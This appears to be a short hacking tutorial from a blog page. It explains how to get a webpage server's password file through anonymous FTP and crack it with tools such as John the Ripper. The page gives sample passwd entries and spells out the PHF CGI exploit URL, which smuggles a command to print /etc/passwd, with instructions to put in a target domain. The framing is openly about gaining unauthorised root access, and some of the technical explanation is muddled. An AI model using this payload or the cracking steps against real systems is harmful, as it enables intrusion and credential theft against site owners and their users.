Hacking Webpages
Getting The
Password File Through FTP:
Ok well one of the
easiest ways of getting super-user access is through anonymous ftp access into
a webpage, first you need learn a little about the password file
Root:User:d7Bdg:1n2HG2:1127:20:superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
This is an example of a
regular encrypted password file, the superuser is the part that gives you root,
that's the main part of the file,
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous
ftp:/u1/ftp:
ftpadmin:x:203:102:ftp
Administrator:/u1/ftp
This is another example
of a password file, only this one has one little difference, it's shadowed,
shadowed password files don't let you view or copy the actual encrypted
password, this causes problems for the password cracker and dictionary maker
below is
another example of a
shadowed password file,
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon
user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:uid
no body:/:
noaccess:x:60002:60002:uid
no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous
FTP:/export/home/anon_ftp:/bin/false
Shadowed password files
have an "x" in the place of a password or sometimes they are
disguised as an * as well, now that you know a little more about what the
actual password file looks like you should be able to identify a normal
encrypted pw from a shadowed, pw file, we can now go on to talk about how to
crack it
Cracking a password file
isn't as complicated as it would seem, although the files vary from system to
system,
1) Take password file,
download or copy it
2) Find a password cracker
and a dictionary maker, although it's nearly impossible to find a good cracker
there are a few ok ones out there, i recomend that you look for cracker jack,
john the ripper, brute force cracker, or jack the ripper, now for a dictionary
maker or a dictionary file, when you start a cracking prog you will be asked to
find the the password file, that's where a dictionary maker comes in, you can
download one from nearly every hacker page on the net, a dictionary maker finds
all the possible letter
combinations with the
alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also
be added)
3) You then start up the cracker
and follow the directions that it gives you
The PHF
Technique:
The phf technique is by
far the easiest way of getting a password file (although it doesn't work 95% of
the time), but to do the phf all you do is open a browser and type in the
following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd,
you replace the webpage_goes_here with the domain, so if you were trying to get
the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
email
hackerblackbox@gmail.com
0 Comments
thanks for your supports